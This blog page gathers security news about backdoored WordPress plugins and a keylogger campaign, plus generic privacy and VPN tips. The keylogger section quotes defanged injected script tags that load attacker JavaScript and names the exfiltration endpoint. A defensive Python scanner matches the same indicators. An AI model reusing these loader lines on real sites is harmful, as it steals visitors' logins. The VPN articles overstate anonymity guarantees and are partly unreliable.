Malicious Backdoored plugins with More than 89,000 Active Installs found in WordPress Repository

WordPress has a massive ecosystem of plugins and themes, and threat actors abuse it for various malicious activities, such as hiding PHP backdoor scripts in a WordPress security plugin.

In this incident, existing unsupported plugins were sold to new authors and had backdoor code inserted; the goal is to insert SEO spam into sites that have the plugin installed.

Wordfence uncovered the incident, and the WordPress security team has closed the plugins in the store, which means they are no longer available to download from the repository.


Malicious WordPress backdoor Plugins

Duplicate Page and Post

The plugin's function is to create a cloned post or page. Its current owner inserted backdoor scripts that make a request and inject cloaked backlinks into the site.

It has more than 50,000 active installs and was removed on December 14, 2017.

No Follow All External Links

It behaves the same as Duplicate Page and Post: the backdoor makes a request and returns content based on the URL, and it is used to inject backlinks for SEO.

It has more than 9,000 active installs and was removed on December 19, 2017.

WP No External Links

It is the same as the previous two backdoors: it makes a request and returns content based on the URL, and it is used to inject backlinks for SEO.

It has more than 30,000 active installs and was removed on December 22, 2017.

Wordfence says Orb Online paid for both the No Follow External Links and Duplicate Page and Posts plugins, and that the same threat actor was involved in purchasing and injecting backdoors into all three of these plugins, with the goal of injecting SEO spam into the thousands of websites running them.

If you have any of these plugins installed, it is highly recommended to uninstall them immediately and scan the website for infection with Sucuri and Gravityscan.

Thousands of WordPress websites get hacked every day, so securing your blog must be top of mind. Luckily, it’s not all rocket-science as you need to make most of the tweaks only once.

Keylogger Discovered in more than 5,000 WordPress Websites

New research revealed that more than 5,000 WordPress websites are running a keylogger, which also tries to run a crypto-miner in the browser of anyone visiting the infected website.

In recent days, WordPress websites have been displaying unwanted banners at the bottom of the page, appearing 15 seconds after browsing the website, because cloudflare[.]solutions scripts were injected into functions.php. The domain does not belong to Cloudflare.

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

The malicious script is loaded on both the front end and the back end, every time someone logs in to the admin panel.

In this case, the second script, cors.js, is injected in an encoded format; once it is decoded, we can see two URLs with long hexadecimal parameters.

The domain name looks like an original Cloudflare URL, but on closer analysis it contains linterkey variables.

Further analysis revealed that linter.js contains the real payload as hexadecimal numbers after the question mark in the URLs.

According to Sucuri, this script adds a handler to every input field on the website to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field.

This payload is capable of keylogging each and every time an admin logs in to their WordPress website.

With this WordPress keylogger, both the username and the password are sent to the cloudflare[.]solutions server even before the user clicks the “Login” button.

Earlier stages of this same campaign, the first and second attacks, took place in April and November; this latest iteration is the one capable of these keylogging features.

The worst part is that if this flow executes successfully on an e-commerce WordPress website, the attacker can access payment-related information.

Mitigation steps for this WordPress Keylogger

  • Perform proper pentesting of the WordPress website – Pentesting Checklist
  • As already mentioned, the malicious code resides in the functions.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.
  • Given the keylogger functionality of this malware, you should consider all WordPress passwords compromised so the next mandatory step of the cleanup is changing the passwords (actually it is highly recommended after any site hack).
  • Don’t forget to check your site for other infections too. Many sites with the malware also have injected coinhive cryptocurrency miner scripts.
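
One way to locate what the cleanup steps above tell you to remove, as an added example that is not code from the original article or from Sucuri: it scans the text of a theme's functions.php for the add_js_scripts function, the add_action clauses that mention it, and script URLs on hosts outside an allowlist. The function names, the allowlist and the sample theme file are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Indicators named in the article; the domain is kept defanged in source
# and re-fanged only for matching.
BAD_HOOK = "add_js_scripts"
BAD_DOMAIN = "cloudflare[.]solutions".replace("[.]", ".")

URL_RE = re.compile(r"""(?:https?|wss?)://[^\s'"<>)]+""", re.I)
FUNC_RE = re.compile(r"\bfunction\s+" + BAD_HOOK + r"\s*\(")
HOOK_RE = re.compile(r"\badd_action\s*\([^;]*['\"]" + BAD_HOOK + r"['\"]")


def host_allowed(host, allowed_domains):
    """True only for an allowed domain or a real subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed_domains)


def audit_functions_php(source, allowed_domains):
    """Return (line_no, kind, detail) findings for a theme's functions.php text."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if FUNC_RE.search(line):
            findings.append((no, "injected_function", BAD_HOOK))
        if HOOK_RE.search(line):
            findings.append((no, "injected_hook", BAD_HOOK))
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname or ""
            if host == BAD_DOMAIN or host.endswith("." + BAD_DOMAIN):
                findings.append((no, "known_bad_host", host))
            elif not host_allowed(host, allowed_domains):
                # Look-alike names fail here: only exact domains or subdomains pass.
                findings.append((no, "unlisted_host", host))
    return findings


# Constructed sample, not taken from a real infected theme.
SAMPLE = "\n".join([
    "<?php",
    "function add_js_scripts() {",
    "  echo \"<script src='http://" + BAD_DOMAIN + "/ajax/libs/cors/cors.js'></script>\";",
    "}",
    "add_action('wp_footer', 'add_js_scripts');",
    "add_action( 'admin_footer', \"add_js_scripts\" );",
    "wp_enqueue_script('jq', 'https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js');",
    "wp_enqueue_script('x', 'https://notcloudflare.com/a.js');",
])

if __name__ == "__main__":
    for finding in audit_functions_php(SAMPLE, {"cloudflare.com", "wordpress.org"}):
        print(finding)
```

Run it against every installed theme, not only the active one, and treat any finding as a reason to rotate passwords as described above.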
6 Ways to Protect Yourself on the Internet

  • Whether you are an employee, owner, or a home worker, your work will certainly involve the internet. However, while the digital world offers a wide range of tools to boost productivity, it is also a hotbed for malware and fraud tools designed to steal your information.

    Wondering how you can stay safe while online? Read on for 6 must-know tips every savvy netizen should know.

    1. Keep your antivirus updated

    In simple terms, an antivirus works by scanning your machine for malware and helping you restrict its spread.

    Unfortunately, malware is constantly evolving. As these internet nasties grow in number and sophistication, the best defense is to frequently update your antivirus.

    By updating your antivirus, you make sure your system is up-to-speed with newly identified viruses and equipped with the latest tools to remove them.

    2. Hide your IP address

    If you don’t like stalkers knowing where you are physically, chances are you don’t want snoops knowing where you are (or what you’re doing) online.

    Whether you want to access social media while abroad, watch the latest sports online, or just want to conceal your internet activity from your ISP, you can’t go wrong by making a habit of hiding your IP.

    There are many ways to hide your IP address. The safest and most reliable to do this is to use a VPN (more on this later).

    3. Use a strong password

    If you’re still using “Password” as your password in 2017, you should probably stop using the internet (for your own good). Your passwords are like the keys to your apartment. Don’t settle for one that any stranger can guess and replicate.

    There are many techniques for building strong passwords, from mixing in a variety of letters, numbers, and symbols to using two-factor authentication for additional security. Another avenue to consider is using a password generator to create passwords that cannot be easily cracked via brute force hacking. You may also want to use a password manager to help you store your passwords.

    4. Don’t access confidential information on public networks and machines

    With the prevalence of Wi-Fi, it’s often a temptation to connect to a public network while traveling or working on the go. The same can often be said for using public computers in libraries and airports.

    While it’s not a problem to use public machines and networks for non-private matters, it would be a very bad idea to log into your social media, bank, or work accounts while on these machines/networks. A bugged machine may have keyloggers installed to track what you type, while a rogue network may capture your data and send it to nefarious individuals while injecting malware into your own device.

    5. Beware of cookies

    Cookies were designed to help websites remember visitors, allowing them to provide a more personalized experience to each user. However, they can also be abused to track your online activity and to send you targeted advertisements.

    To protect yourself from malicious cookies, remember to delete any cookies after each browsing session. You can also use a private web browser such as Tor.

    6. Use a VPN

    A VPN is a swiss-army knife for online safety. It hides your IP address (as mentioned above), anonymizes the data you send into the internet, and can even let you access geolocation-specific discounts and content.

    That said, be careful when choosing a VPN provider. Make sure the provider offers a wide range of locations, does not keep user-identifying logs, and is not a free VPN service. Maintaining high quality VPN servers is not a cheap proposition, and if they’re not charging you for it, they’re almost certainly making money by selling your activity to a third party somewhere else.

    The internet remains a wonderful place for productivity, entertainment, and innovation. However, many dangers await the unwary. Remember to follow these practices, exercise common sense whenever you’re unsure, and you’ll be able to enjoy the best of the internet without worry.

4 Reasons Encryption Is An Entrepreneur’s Best Friend

  • If you’re an entrepreneur and you use public Wi-Fi, you’re an easy target for hackers looking for data to steal. Public Wi-Fi today is usually unencrypted, which means it’s open season for hackers.

    Encryption is vital to your privacy and data security, which translates to maintaining your business without having your bank accounts and proprietary information stolen.

    Encryption in a nutshell

    Encryption transforms data into an unreadable form that can only be decrypted by a special key. An encrypted file, when opened, will look like gibberish until it’s properly decrypted.

    If you haven’t given genuine consideration to encrypting your data, here are 4 reasons you should:

    1. If you use public Wi-Fi, your data is at risk

    When your Wi-Fi network is password protected, that password protects the websites you visit from being discovered by other people. Without a password, hackers can access the websites you visit, along with anything you type into unencrypted web forms.

    Public Wi-Fi has never been completely secure, although in years past it was commonly protected by a temporary password that would only be provided with a purchase. This type of protection made it harder for hackers to gain access to information being sent across the network.

    You can’t control whether or not public Wi-Fi is encrypted, but you can take your own precautions to protect yourself like using a VPN to route your traffic through an encrypted server. While a VPN isn’t a guaranteed solution, it does decrease your risk of getting hacked.

    2. You can’t rely on encrypted websites

    Just because a website is encrypted doesn’t mean you are automatically protected anytime you visit that site. For example, your bank’s website is probably encrypted, but if you’re using an unencrypted Wi-Fi network to access your bank’s website, your login credentials could easily be stolen as you type them in.

    Hackers can also hijack HTTP connections and create fake HTTPS links that you think are real, allowing a man-in-the-middle attack to intercept what would otherwise be a secure browsing experience.

    If your computer is infected with a keystroke logger, anything you type into your computer will be transmitted to the hacker, even if you’re connected to the most secure network in the world.

    If you’re on an unencrypted network, like the ones at Starbucks, someone could sit in the lobby with a simple tool and hijack your browsing session.

    The only way to prevent this is to keep your data encrypted on your computer, or better yet, don’t use public Wi-Fi networks when conducting your business.

    3. Emails can be hijacked

    Encrypting emails is especially important because that’s where most company communications take place. Credit card numbers and company secrets are commonly exchanged through email, and if anyone is snooping in on your email conversations you can guarantee that information will fall into the wrong hands.

    Some businesses only require employees to encrypt emails they consider to be private, but employees might misjudge what’s considered private. That’s why you should install a program on your company’s email server that encrypts every email, and not allow staff to encrypt selectively.

    4. Not all hotspots are authentic

    Hackers often create fake hotspots to trick people into connecting to what they think is their usual coffee shop Wi-Fi network. For example, they might bring a device into Starbucks and set up a fake hotspot called “Starbucks.” If you’re savvy enough to remember how the real network’s name is spelled, you won’t get caught in this trap.

    Real networks are prone to becoming compromised, though, so even connecting to a genuine hotspot could be dangerous.

    Data encryption isn’t just for top-secret files created by the government. There are real threats out there, and your data in any form should be encrypted at its destination as well as in transit.

The Importance Of Using A VPN

  • Almost every household in America now has access to the Internet. You pay a substantial fee each and every month and should be able to use the Internet freely without hurdles. Nevertheless, some companies and governments believe otherwise. These entities want to monitor your online activities all day, every day to ensure that you’re not up to something malicious. Or perhaps these groups are simply paranoid and prefer to keep users under lock and key? Whatever the case might be, everyone should learn how to protect their identity online. The importance of learning to use a VPN will be explored in greater detail below.

    No Restrictions

    In some cases, using a virtual private network is done to shield your identity. In others, the user may wish to break the constraints and gain access to content that may be blocked in their country. YouTube, Netflix, Hulu and other websites have content that is only accessible to people from certain geographical regions. In this type of situation, it would be impossible to access this content. This is where a virtual private network will come in handy. By utilizing a VPN, you will be able to make it appear that your company is located in a different area.

    This will allow you to jump the hurdle and unlock the content immediately.

    Maintaining Your Anonymity

    Privacy has become a major concern for consumers all around the world. Today, consumers understand that they’re consistently watched by the government, as well as the world’s biggest corporations. Wouldn’t it be nice to be able to elude their monitoring systems? This is truly one of the most common uses of a virtual private network. VPNs tend to be much more effective at hiding the user’s identity than proxies and IP maskers. By utilizing a VPN, you will be able to secure your identity, connections and communications.

    Using the best VPN will make it impossible for your Internet service provider to track your activities. Simultaneously, the websites and applications you use will not be able to gain access to your true identity.

    Changing Your IP

    As you likely already know, each and every computer connected to the Internet is assigned an IP address. Your IP address closely resembles your fingerprint, but there is a major difference. While it is generally not possible to alter your fingerprint, your IP can be changed fairly easily. Oftentimes, consumers can simply disconnect from the Internet, reconnect and gain a new address. However, you may be interested in a more dramatic change. If so, you will definitely want to set up your computer to use a virtual private network right now.

    With a VPN, you will be able to change your address, as well as other details. This can be a good way to gain access to websites that have previously banned your IP address or IP range.

    Improved Wi-Fi Security

    Security is a major concern when it comes to connecting to the Internet through a Wi-Fi hotspot. It can be convenient to use the Wi-Fi at an airport, restaurant or bookstore, but there are many risks involved. When utilizing a free Wi-Fi hotspot, there is a possibility that a hacker will be able to log the unencrypted data sent from your computer to the websites that you’re using at any given time. It is pertinent to take steps to prevent this from happening! A VPN is a great solution to this precise problem.

    A VPN will give you the ability to encrypt your activities, so they cannot be used by hackers. If you want to keep your social media or banking details private while using a free Wi-Fi hotspot, a VPN is truly a necessity.

    Accessing Censored Websites

    Believe it or not, some governments believe it is in their citizens’ best interest to block access to certain websites. In some countries, such as China, websites like YouTube and WikiLeaks have been blocked. This can make it very difficult for people living in these countries to know what is going on in the outside world. VPNs give these individuals the freedom to browse these websites and gain access to the truth! If you happen to live in a country that restricts your freedom to use the Internet as you see fit, you should learn how to use a VPN as soon as possible.